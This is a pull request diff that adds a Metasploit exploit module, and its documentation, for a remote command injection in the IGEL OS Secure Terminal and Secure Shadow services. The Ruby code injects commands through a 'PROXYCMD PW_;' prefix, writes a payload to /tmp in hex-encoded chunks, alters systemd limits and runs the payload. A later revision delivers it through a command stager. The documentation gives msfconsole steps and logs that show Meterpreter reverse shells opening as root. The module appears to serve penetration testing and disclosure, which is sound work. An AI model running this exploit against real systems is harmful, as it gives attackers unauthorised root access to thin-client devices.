### PR TITLE
Add module IGEL OS Remote Command Execution

### DIFF
--- a/documentation/modules/exploit/linux/misc/igel_command_injection.md
+++ b/documentation/modules/exploit/linux/misc/igel_command_injection.md
@@ -1,8 +1,10 @@
 ## Vulnerable Application
 
-IGEL OS before 11.04.270 and 10.06.220 are vulnerable to remote command execution into a `system()` call via Secure Terminal and Secure Shadow services.
+IGEL OS before 11.04.270 and 10.06.220 are vulnerable to remote command execution into a `system()` call via Secure Terminal and Secure
+Shadow services.
 
-This module uses the vulnerability to modify certain systemd limits for the targeted service before transfering the payload; this is done to increase payload transfer throughput and preserve service stability.  After exploitation these changes are reverted.
+This module uses the vulnerability to modify certain systemd limits for the targeted service before transfering the payload; this is done
+to increase payload transfer throughput and preserve service stability.  After exploitation these changes are reverted.
 
 Secure Terminal/telnet_ssl_connector:   30022/tcp
 Secure Shadow/vnc_ssl_connector:        5900/tcp
@@ -16,15 +18,20 @@ Unpack downloaded zip file and create a VM using the included .iso.
 
 Navigate through the installation menus to install the firmware, reboot when prompted
 
-After rebooted work through the presented configuration wizard.  In the Activation section use the starter license (selected by default).  Skip the ICG Agent Setup.  Upon completion the system will reboot again.
+After rebooted work through the presented configuration wizard.  In the Activation section use the starter license (selected by default).
+Skip the ICG Agent Setup.  Upon completion the system will reboot again.
 
 ### Turn on vulnerable services
 
 1. Click on the launcher menu
 2. Click on the gear icon
 3. Select "Setup" from the Application menu to launch the Setup app
-4. To enable vulnerable VNC service wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Shadow.  Ensure "Allow remote shadowing" and "Secure mode" are checked.
-5. To enable vulnerable terminal wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Secure Terminal. Ensure "Secure Terminal" is checked.
+4. Enable vulnerable VNC service wrapper
+    1. Under the configuration menu on the left Navigate to: System > Remote Access > Shadow.
+    2. Ensure "Allow remote shadowing" and "Secure mode" are checked.
+5. Enable vulnerable terminal wrapper
+    1. Under the configuration menu on the left Navigate to: System > Remote Access > Secure Terminal.
+    2. Ensure "Secure Terminal" is checked.
 
 ### Exploitation
 
@@ -37,7 +44,8 @@ After rebooted work through the presented configuration wizard.  In the Activati
 
 ### Misc
 
-To obtain the IGEL's IP address to test against click the up/down arrows on the right side of the task bar then click "More Details".  A shell is available on a virtual console by ctrl+alt+F11, switch back to the GUI with ctrl+alt+F1.
+To obtain the IGEL's IP address to test against click the up/down arrows on the right side of the task bar then click "More Details".
+A shell is available on a virtual console by ctrl+alt+F11, switch back to the GUI with ctrl+alt+F1.
 
 This module has been successfully tested against IGEL OS 11.04.130 and 10.05.500.
 

--- a/documentation/modules/exploit/linux/misc/igel_command_injection.md
+++ b/documentation/modules/exploit/linux/misc/igel_command_injection.md
@@ -1,0 +1,107 @@
+## Vulnerable Application
+
+IGEL OS before 11.04.270 and 10.06.220 are vulnerable to remote command execution into a `system()` call via Secure Terminal and Secure Shadow services.
+
+This module uses the vulnerability to modify certain systemd limits for the targeted service before transfering the payload; this is done to increase payload transfer throughput and preserve service stability.  After exploitation these changes are reverted. 
+
+Secure Terminal/telnet_ssl_connector:   30022/tcp  
+Secure Shadow/vnc_ssl_connector:        5900/tcp
+
+
+## Verification Steps
+
+Download Vulnerable IGEL OS version (e.g. 11.04.130) from: https://www.igel.com/software-downloads/workspace-edition/.
+
+Unpack downloaded zip file and create a VM using the included .iso.
+
+Navigate through the installation menus to install the firmware, reboot when prompted
+
+After rebooted work through the presented configuration wizard.  In the Activation section use the starter license (selected by default).  Skip the ICG Agent Setup.  Upon completion the system will reboot again.
+
+### Turn on vulnerable services
+
+1. Click on the launcher menu
+2. Click on the gear icon
+3. Select "Setup" from the Application menu to launch the Setup app
+4. To enable vulnerable VNC service wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Shadow.  Ensure "Allow remote shadowing" and "Secure mode" are checked.
+5. To enable vulnerable terminal wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Secure Terminal. Ensure "Secure Terminal" is checked.
+
+### Exploitation
+
+1. start msfconsole
+2. `use exploit/linux/misc/igel_command_injection`
+3. `set RHOST [TARGET IP]`
+4. `set RPORT [30022 or 5900]`
+5. `set LHOST [LOCAL IP]`
+6. `exploit`
+
+### Misc
+
+To obtain the IGEL's IP address to test against click the up/down arrows on the right side of the task bar then click "More Details".  A shell is available on a virtual console by ctrl+alt+F11, switch back to the GUI with ctrl+alt+F1.
+
+This module has been successfully tested against IGEL OS 11.04.130 and 10.05.500 with metasploit framework 6.0.31-dev on Kali.
+
+
+## Scenarios
+
+### IGEL OS 11.04.130
+
+Targeting the Secure Terminal service (30022/tcp):
+
+```
+msf6 > use exploit/linux/misc/igel_command_injection 
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.224
+RHOST => 192.168.120.224
+msf6 exploit(linux/misc/igel_command_injection) > check
+[*] 192.168.120.224:30022 - The target appears to be vulnerable.
+msf6 exploit(linux/misc/igel_command_injection) > run
+
+[*] Started reverse TCP handler on 192.168.120.225:4444 
+[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.service StartLimitBurst
+[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.socket TriggerLimitBurst
+[*] 192.168.120.224:30022 - Writing payload to file /tmp/CPr9.
+[*] 192.168.120.224:30022 - Executing payload /tmp/CPr9.
+[*] 192.168.120.224:30022 - Removing payload file /tmp/CPr9.
+[*] Sending stage (39324 bytes) to 192.168.120.224
+[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.224:48130) at 2021-03-25 12:29:45 -0400
+[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.service
+[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.socket
+
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```
+
+### IGEL OS 10.05.500
+
+Targeting the Secure Shadowing service (5900/tcp):
+
+```
+msf6 > use exploit/linux/misc/igel_command_injection 
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.226
+RHOST => 192.168.120.226
+msf6 exploit(linux/misc/igel_command_injection) > set RPORT 5900
+RPORT => 5900
+msf6 exploit(linux/misc/igel_command_injection) > run
+
+[*] Started reverse TCP handler on 192.168.120.225:4444 
+[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.service StartLimitBurst
+[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.socket TriggerLimitBurst
+[*] 192.168.120.226:5900 - Writing payload to file /tmp/lSmU.
+[*] 192.168.120.226:5900 - Executing payload /tmp/lSmU.
+[*] 192.168.120.226:5900 - Removing payload file /tmp/lSmU.
+[*] Sending stage (39328 bytes) to 192.168.120.226
+[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.service
+[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.socket
+[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.226:55144) at 2021-03-25 12:48:34 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```

--- a/documentation/modules/exploit/linux/misc/igel_command_injection.md
+++ b/documentation/modules/exploit/linux/misc/igel_command_injection.md
@@ -2,9 +2,9 @@
 
 IGEL OS before 11.04.270 and 10.06.220 are vulnerable to remote command execution into a `system()` call via Secure Terminal and Secure Shadow services.
 
-This module uses the vulnerability to modify certain systemd limits for the targeted service before transfering the payload; this is done to increase payload transfer throughput and preserve service stability.  After exploitation these changes are reverted. 
+This module uses the vulnerability to modify certain systemd limits for the targeted service before transfering the payload; this is done to increase payload transfer throughput and preserve service stability.  After exploitation these changes are reverted.
 
-Secure Terminal/telnet_ssl_connector:   30022/tcp  
+Secure Terminal/telnet_ssl_connector:   30022/tcp
 Secure Shadow/vnc_ssl_connector:        5900/tcp
 
 
@@ -39,8 +39,9 @@ After rebooted work through the presented configuration wizard.  In the Activati
 
 To obtain the IGEL's IP address to test against click the up/down arrows on the right side of the task bar then click "More Details".  A shell is available on a virtual console by ctrl+alt+F11, switch back to the GUI with ctrl+alt+F1.
 
-This module has been successfully tested against IGEL OS 11.04.130 and 10.05.500 with metasploit framework 6.0.31-dev on Kali.
+This module has been successfully tested against IGEL OS 11.04.130 and 10.05.500.
 
+## Options
 
 ## Scenarios
 

--- a/modules/exploits/linux/misc/igel_command_injection.rb
+++ b/modules/exploits/linux/misc/igel_command_injection.rb
@@ -101,15 +101,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     version = matches.captures[0]
     vprint_status("IGEL OS Version: #{version}")
-    major, minor, patch = version.split('.')
-    if major.to_i == 10
-      if (minor.to_i < 6) || ((minor.to_i == 6) && (patch.to_i < 220))
-        return Exploit::CheckCode::Appears
-      end
-    elsif major.to_i == 11
-      if (minor.to_i < 4) || ((minor.to_i == 4) && (patch.to_i < 270))
-        return Exploit::CheckCode::Appears
-      end
+    version = Rex::Version.new(version)
+
+    if version < Rex::Version.new('10.06.220') && version >= Rex::Version.new('10.0.0')
+      return Exploit::CheckCode::Appears
+    elsif version < Rex::Version.new('11.04.270') && version >= Rex::Version.new('11.0.0')
+      return Exploit::CheckCode::Appears
     end
 
     return Exploit::CheckCode::Safe

--- a/modules/exploits/linux/misc/igel_command_injection.rb
+++ b/modules/exploits/linux/misc/igel_command_injection.rb
@@ -3,48 +3,54 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Tcp
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'            => "IGEL OS Secure VNC/Terminal Command Injection RCE",
-      'Description'     => %q{
-        This module exploits a command injection vulnerability in IGEL OS Secure Terminal
-        and Secure Shadow services.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'IGEL OS Secure VNC/Terminal Command Injection RCE',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in IGEL OS Secure Terminal
+          and Secure Shadow services.
 
-        Both Secure Terminal (telnet_ssl_connector - 30022/tcp) and Secure
-        Shadow (vnc_ssl_connector - 5900/tcp) services are vulnerable.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          => [
-        'Rob Vinson',         # Discovery
-        'James Brytan',       # Research and testing
-        'James Smith',        # Research and testing
-        'Marisa Mack',        # Research and testing
-        'Sergey Pashevkin',   # Research and testing
-        'Steven Laura'        # Research and testing
-      ],
-      'References'      => [
-        [ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ],
-        [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ]
-      ],
-      'Platform'        => ['python'],
-      'Arch'            => [ARCH_PYTHON],
-      'Targets'         => [
-        [ 'Python payload',
-          'Arch' => ARCH_PYTHON,
-          'Type' => :python,
-          'Platform' => 'python',
-          'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}
+          Both Secure Terminal (telnet_ssl_connector - 30022/tcp) and Secure
+          Shadow (vnc_ssl_connector - 5900/tcp) services are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Rob Vinson',         # Discovery
+          'James Brytan',       # Research and testing
+          'James Smith',        # Research and testing
+          'Marisa Mack',        # Research and testing
+          'Sergey Pashevkin',   # Research and testing
+          'Steven Laura'        # Research and testing
         ],
-      ],
-      'Privileged'      => false,
-      'DisclosureDate'  => "2021-02-25",
-      'DefaultTarget'   => 0,
-      'Notes'           => {
-        'SideEffects'   => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
-        'Reliability'   => [REPEATABLE_SESSION],
-        'Stability'     => [CRASH_SAFE],
-      }
-    ))
+        'References' => [
+          [ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ],
+          [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ]
+        ],
+        'Platform' => ['python'],
+        'Arch' => [ARCH_PYTHON],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Arch' => ARCH_PYTHON,
+              'Type' => :python,
+              'Platform' => 'python',
+              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+            }
+          ],
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2021-02-25',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE]
+        }
+      )
+    )
 
     register_options(
       [
@@ -60,63 +66,55 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-
   def check
     probe = '<igel_scan></igel_scan>'
 
-    begin
-      sock = Rex::Socket::Udp.create(
-        'PeerHost'  =>  datastore['RHOST'] || rhost,
-        'PeerPort'  => 30005,
-        'LocalHost' =>  datastore['CHOST'] || chost || "0.0.0.0",
-        'LocalPort' => (datastore['CPORT'] || cport || 0).to_i,
-        'Context'   => {
-            'Msf' => framework,
-            'MsfExploit' => self
-        },
-      )
+    sock = Rex::Socket::Udp.create(
+      'PeerHost' => datastore['RHOST'] || rhost,
+      'PeerPort' => 30005,
+      'LocalHost' => datastore['CHOST'] || chost || '0.0.0.0',
+      'LocalPort' => (datastore['CPORT'] || cport || 0).to_i,
+      'Context' => {
+        'Msf' => framework,
+        'MsfExploit' => self
+      }
+    )
 
-      sock.put(probe)
-      res = sock.recvfrom(65535, 0.5)
-      if not res
-        return Exploit::CheckCode::Unknown
-      end
+    sock.put(probe)
+    res = sock.recvfrom(65535, 0.5)
+    sock.close if sock
 
-      probe_response = res[0]
-      matches = probe_response.match(/firmwareversion=<([0-9\.]+)>/)
-      if not matches
-        return Exploit::CheckCode::Unknown
-      end
-
-      version = matches.captures[0]
-      vprint_status("IGEL OS Version: #{version}")
-      major, minor, patch, revision = version.split(".")
-      if major.to_i == 10
-        if minor.to_i < 6 or  (minor.to_i == 6 and patch.to_i < 220)
-          return Exploit::CheckCode::Appears
-        end
-      elsif major.to_i == 11
-        if minor.to_i < 4 or  (minor.to_i == 4 and patch.to_i < 270)
-          return Exploit::CheckCode::Appears
-        end
-      end
-
-      return Exploit::CheckCode::Safe
-
-    rescue ::Exception => e
-      vprint_error("Unknown err: #{e.class} #{e}")
+    if !res || res[0].empty?
       return Exploit::CheckCode::Unknown
-    ensure
-      sock.close if sock
     end
-  end
 
+    probe_response = res[0]
+    matches = probe_response.match(/firmwareversion=<([0-9.]+)>/)
+    if !matches
+      return Exploit::CheckCode::Unknown
+    end
+
+    version = matches.captures[0]
+    vprint_status("IGEL OS Version: #{version}")
+    major, minor, patch = version.split('.')
+    if major.to_i == 10
+      if (minor.to_i < 6) || ((minor.to_i == 6) && (patch.to_i < 220))
+        return Exploit::CheckCode::Appears
+      end
+    elsif major.to_i == 11
+      if (minor.to_i < 4) || ((minor.to_i == 4) && (patch.to_i < 270))
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    return Exploit::CheckCode::Safe
+  end
 
   # execute a shell command on the target.
   # cmdstr is limited to 223 characters
   def exec_cmd(cmdstr)
     if cmdstr.length > 223
-      raise ArgumentError.new("Attempted command is too large")
+      raise ArgumentError, 'Attempted command is too large'
     end
 
     cmdfull = "#{cmdstr};false"
@@ -136,49 +134,42 @@ class MetasploitModule < Msf::Exploit::Remote
         vprint_error("retries exhausted: #{e.class} #{e}")
         raise e
       end
-    rescue ::Exception => e
-      vprint_error("failed: #{e.class} #{e}")
-      raise e
     ensure
       disconnect
     end
   end
 
-
   # chunks up buffer, encodes chunk as a hex string, and echos it to path one chunk at a time
   def write_file(buf, path)
     slice_size = (223 - %(bash -c 'echo -ne "">>#{path}').length) / 4
-    buf.split("").each_slice(slice_size) do |ary|
+    buf.split('').each_slice(slice_size) do |ary|
       buf_part = ary.join
-      hex = buf_part.each_byte.map {|b| "\\x#{b.to_s(16)}"}.join
+      hex = buf_part.each_byte.map { |b| "\\x#{b.to_s(16)}" }.join
       begin
         exec_cmd(%(bash -c 'echo -ne "#{hex}">>#{path}'))
       rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
         fail_with(Failure::Unreachable, "Failed writing to #{path} with error #{e}.")
-      rescue ::Exception => e
-        fail_with(Failure::Unknown, "Failed writing to #{path} with error #{e}.")
       end
     end
   end
-
 
   # somewhat arbitrary cutoff of what designates a large payload
   def big_payload?
     if payload.encoded.length > 1024
       return true
     end
+
     return false
   end
-
 
   def adjust_systemd_props
     # Adjust limits to keep throttling from stopping the services or otherwise
     # slowing us down
-    svc = "vnc"
+    svc = 'vnc'
     if datastore['RPORT'] == 5900
-      svc = "vnc"
+      svc = 'vnc'
     elsif datastore['RPORT'] == 30022
-      svc = "telnet"
+      svc = 'telnet'
     end
 
     print_status("Overriding igel-#{svc}-ssl-connector.service StartLimitBurst")
@@ -190,13 +181,12 @@ class MetasploitModule < Msf::Exploit::Remote
     exec_cmd(%(systemctl daemon-reload))
   end
 
-
   def cleanup_systemd_props
-    svc = "vnc"
+    svc = 'vnc'
     if datastore['RPORT'] == 5900
-      svc = "vnc"
+      svc = 'vnc'
     elsif datastore['RPORT'] == 30022
-      svc = "telnet"
+      svc = 'telnet'
     end
 
     print_status("Removing override for igel-#{svc}-ssl-connector.service")
@@ -206,42 +196,33 @@ class MetasploitModule < Msf::Exploit::Remote
     exec_cmd(%(systemctl deamon-reload))
   end
 
-
   def remove_file(path)
-    begin
-      exec_cmd(%(rm #{path}))
-    rescue
-      print_warning("Failed to remove file #{path}.")
-    end
+    exec_cmd(%(rm #{path}))
   end
-
 
   def exploit
     path = "/tmp/#{rand_text_alphanumeric(4)}"
     if big_payload?
-      print_warning("The payload selected is relatively large.  This could take a few minutes, be patient.")
+      print_warning('The payload selected is relatively large.  This could take a few minutes, be patient.')
     end
 
-    adjust_systemd_props
-    print_status("Writing payload to file #{path}.")
-    write_file(payload.encoded, path)
-
     begin
+      adjust_systemd_props
+      print_status("Writing payload to file #{path}.")
+      write_file(payload.encoded, path)
+
       # execute python payload. systemd-run is used to prevent systemd from killing
       # the resulting processes
       print_status("Executing payload #{path}.")
       exec_cmd(%(/usr/bin/systemd-run --scope bash -c "python #{path}"))
-
+      print_status("Removing payload file #{path}.")
+      remove_file(path)
+      cleanup_systemd_props
     rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
       fail_with(Failure::Unreachable, "Failed executing payload with error #{e}.")
-
-    rescue ::Exception => e
-      fail_with(Failure::Unknown, "Failed executing payload with error #{e}.")
     end
-
-    print_status("Removing payload file #{path}.")
-    remove_file(path)
-    cleanup_systemd_props
   end
 
 end
+
+# vim ts=2 sw=2 sts=2 et tw=78

--- a/modules/exploits/linux/misc/igel_command_injection.rb
+++ b/modules/exploits/linux/misc/igel_command_injection.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
         ],
-        'Privileged' => false,
+        'Privileged' => true,
         'DisclosureDate' => '2021-02-25',
         'DefaultTarget' => 0,
         'Notes' => {

--- a/modules/exploits/linux/misc/igel_command_injection.rb
+++ b/modules/exploits/linux/misc/igel_command_injection.rb
@@ -6,8 +6,9 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -34,34 +35,41 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ],
           [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ]
         ],
-        'Platform' => ['python'],
-        'Arch' => [ARCH_PYTHON],
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_X86, ARCH_X64],
         'Targets' => [
           [
-            'Python payload',
+            'Secure Terminal Service',
             {
-              'Arch' => ARCH_PYTHON,
-              'Type' => :python,
-              'Platform' => 'python',
-              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :cmd,
+              'Platform' => 'linux',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'RPORT' => 30022 }
+            }
+          ],
+          [
+            'Secure Shadow Service',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :cmd,
+              'Platform' => 'linux',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'RPORT' => 5900 }
             }
           ],
         ],
         'Privileged' => true,
         'DisclosureDate' => '2021-02-25',
+        'CmdStagerFlavor' => ['printf'],
         'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PrependFork' => true
+        },
         'Notes' => {
           'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
           'Reliability' => [REPEATABLE_SESSION],
           'Stability' => [CRASH_SAFE]
         }
       )
-    )
-
-    register_options(
-      [
-        Opt::RPORT(30022)
-      ]
     )
 
     register_advanced_options(
@@ -96,6 +104,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if version < Rex::Version.new('10.06.220') && version >= Rex::Version.new('10.0.0')
       return Exploit::CheckCode::Appears
+    elsif version < Rex::Version.new('11.04') && version >= Rex::Version.new('11.03.620')
+      return Exploit::CheckCode::Safe
     elsif version < Rex::Version.new('11.04.270') && version >= Rex::Version.new('11.0.0')
       return Exploit::CheckCode::Appears
     end
@@ -103,114 +113,17 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Safe
   end
 
-  # execute a shell command on the target.
-  # cmdstr is limited to 223 characters
-  def exec_cmd(cmdstr)
-    if cmdstr.length > 223
-      raise ArgumentError, 'Attempted command is too large'
-    end
-
-    cmdfull = "#{cmdstr};false"
-    vprint_status("executing #{cmdfull}")
-    retries = 0
-
-    begin
-      connect
-      sock.put(%(PROXYCMD PW_;#{cmdfull}))
-    rescue ::Rex::ConnectionRefused, Errno::ECONNRESET => e
-      if retries < 5
-        retries += 1
-        sleep 0.5 * (2**retries)
-        vprint_status("retrying command - #{retries}")
-        retry
-      else
-        vprint_error("retries exhausted: #{e.class} #{e}")
-        raise e
-      end
-    ensure
-      disconnect
-    end
-  end
-
-  # chunks up buffer, encodes chunk as a hex string, and echos it to path one chunk at a time
-  def write_file(buf, path)
-    slice_size = (223 - %(bash -c 'echo -ne "">>#{path}').length) / 4
-    buf.split('').each_slice(slice_size) do |ary|
-      buf_part = ary.join
-      hex = buf_part.each_byte.map { |b| "\\x#{b.to_s(16)}" }.join
-      begin
-        exec_cmd(%(bash -c 'echo -ne "#{hex}">>#{path}'))
-      rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
-        fail_with(Failure::Unreachable, "Failed writing to #{path} with error #{e}.")
-      end
-    end
-  end
-
-  # somewhat arbitrary cutoff of what designates a large payload
-  def big_payload?
-    if payload.encoded.length > 1024
-      return true
-    end
-
-    return false
-  end
-
-  def adjust_systemd_props
-    # Adjust limits to keep throttling from stopping the services or otherwise
-    # slowing us down
-    svc = 'vnc'
-    if datastore['RPORT'] == 5900
-      svc = 'vnc'
-    elsif datastore['RPORT'] == 30022
-      svc = 'telnet'
-    end
-
-    print_status("Overriding igel-#{svc}-ssl-connector.service StartLimitBurst")
-    exec_cmd(%(mkdir /etc/systemd/system/igel-#{svc}-ssl-connector.service.d))
-    exec_cmd(%(printf "[Service]\\nStartLimitBurst=9999\\n" > /etc/systemd/system/igel-#{svc}-ssl-connector.service.d/override.conf))
-    print_status("Overriding igel-#{svc}-ssl-connector.socket TriggerLimitBurst")
-    exec_cmd(%(mkdir /etc/systemd/system/igel-#{svc}-ssl-connector.socket.d))
-    exec_cmd(%(printf "[Socket]\\nTriggerLimitBurst=9999\\n" > /etc/systemd/system/igel-#{svc}-ssl-connector.socket.d/override.conf))
-    exec_cmd(%(systemctl daemon-reload))
-  end
-
-  def cleanup_systemd_props
-    svc = 'vnc'
-    if datastore['RPORT'] == 5900
-      svc = 'vnc'
-    elsif datastore['RPORT'] == 30022
-      svc = 'telnet'
-    end
-
-    print_status("Removing override for igel-#{svc}-ssl-connector.service")
-    exec_cmd(%(rm /etc/systemd/system/igel-#{svc}-ssl-connector.service.d/override.conf))
-    print_status("Removing override for igel-#{svc}-ssl-connector.socket")
-    exec_cmd(%(rm /etc/systemd/system/igel-#{svc}-ssl-connector.socket.d/override.conf))
-    exec_cmd(%(systemctl deamon-reload))
-  end
-
-  def remove_file(path)
-    exec_cmd(%(rm #{path}))
+  def execute_command(cmd, _opts = {})
+    vprint_status("executing: #{cmd}")
+    connect
+    sock.put(%(PROXYCMD PW_;/usr/bin/systemd-run --scope bash -c "#{cmd}";false))
+  ensure
+    disconnect
   end
 
   def exploit
-    path = "/tmp/#{rand_text_alphanumeric(4)}"
-    if big_payload?
-      print_warning('The payload selected is relatively large.  This could take a few minutes, be patient.')
-    end
-
     begin
-      adjust_systemd_props
-      print_status("Writing payload to file #{path}.")
-      write_file(payload.encoded, path)
-
-      # execute python payload. systemd-run is used to prevent systemd from killing
-      # the resulting processes
-      print_status("Executing payload #{path}.")
-      exec_cmd(%(/usr/bin/systemd-run --scope bash -c "python #{path}"))
-      print_status("Removing payload file #{path}.")
-      remove_file(path)
-      cleanup_systemd_props
+      execute_cmdstager(linemax: 150, noconcat: true, delay: 2)
     rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
       fail_with(Failure::Unreachable, "Failed executing payload with error #{e}.")
     end

--- a/modules/exploits/linux/misc/igel_command_injection.rb
+++ b/modules/exploits/linux/misc/igel_command_injection.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Udp
 
   def initialize(info = {})
     super(
@@ -74,20 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     probe = '<igel_scan></igel_scan>'
 
-    sock = Rex::Socket::Udp.create(
-      'PeerHost' => datastore['RHOST'] || rhost,
-      'PeerPort' => 30005,
-      'LocalHost' => datastore['CHOST'] || chost || '0.0.0.0',
-      'LocalPort' => (datastore['CPORT'] || cport || 0).to_i,
-      'Context' => {
-        'Msf' => framework,
-        'MsfExploit' => self
-      }
-    )
-
-    sock.put(probe)
-    res = sock.recvfrom(65535, 0.5)
-    sock.close if sock
+    connect_udp(true, 'RPORT' => 30005)
+    udp_sock.put(probe)
+    res = udp_sock.recvfrom(65535, 0.5)
+    disconnect_udp
 
     unless res && res[0]
       return Exploit::CheckCode::Unknown

--- a/modules/exploits/linux/misc/igel_command_injection.rb
+++ b/modules/exploits/linux/misc/igel_command_injection.rb
@@ -1,3 +1,8 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -224,5 +229,3 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 end
-
-# vim ts=2 sw=2 sts=2 et tw=78

--- a/modules/exploits/linux/misc/igel_command_injection.rb
+++ b/modules/exploits/linux/misc/igel_command_injection.rb
@@ -1,0 +1,247 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'            => "IGEL OS Secure VNC/Terminal Command Injection RCE",
+      'Description'     => %q{
+        This module exploits a command injection vulnerability in IGEL OS Secure Terminal
+        and Secure Shadow services.
+
+        Both Secure Terminal (telnet_ssl_connector - 30022/tcp) and Secure
+        Shadow (vnc_ssl_connector - 5900/tcp) services are vulnerable.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          => [
+        'Rob Vinson',         # Discovery
+        'James Brytan',       # Research and testing
+        'James Smith',        # Research and testing
+        'Marisa Mack',        # Research and testing
+        'Sergey Pashevkin',   # Research and testing
+        'Steven Laura'        # Research and testing
+      ],
+      'References'      => [
+        [ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ],
+        [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ]
+      ],
+      'Platform'        => ['python'],
+      'Arch'            => [ARCH_PYTHON],
+      'Targets'         => [
+        [ 'Python payload',
+          'Arch' => ARCH_PYTHON,
+          'Type' => :python,
+          'Platform' => 'python',
+          'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}
+        ],
+      ],
+      'Privileged'      => false,
+      'DisclosureDate'  => "2021-02-25",
+      'DefaultTarget'   => 0,
+      'Notes'           => {
+        'SideEffects'   => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+        'Reliability'   => [REPEATABLE_SESSION],
+        'Stability'     => [CRASH_SAFE],
+      }
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(30022)
+      ]
+    )
+
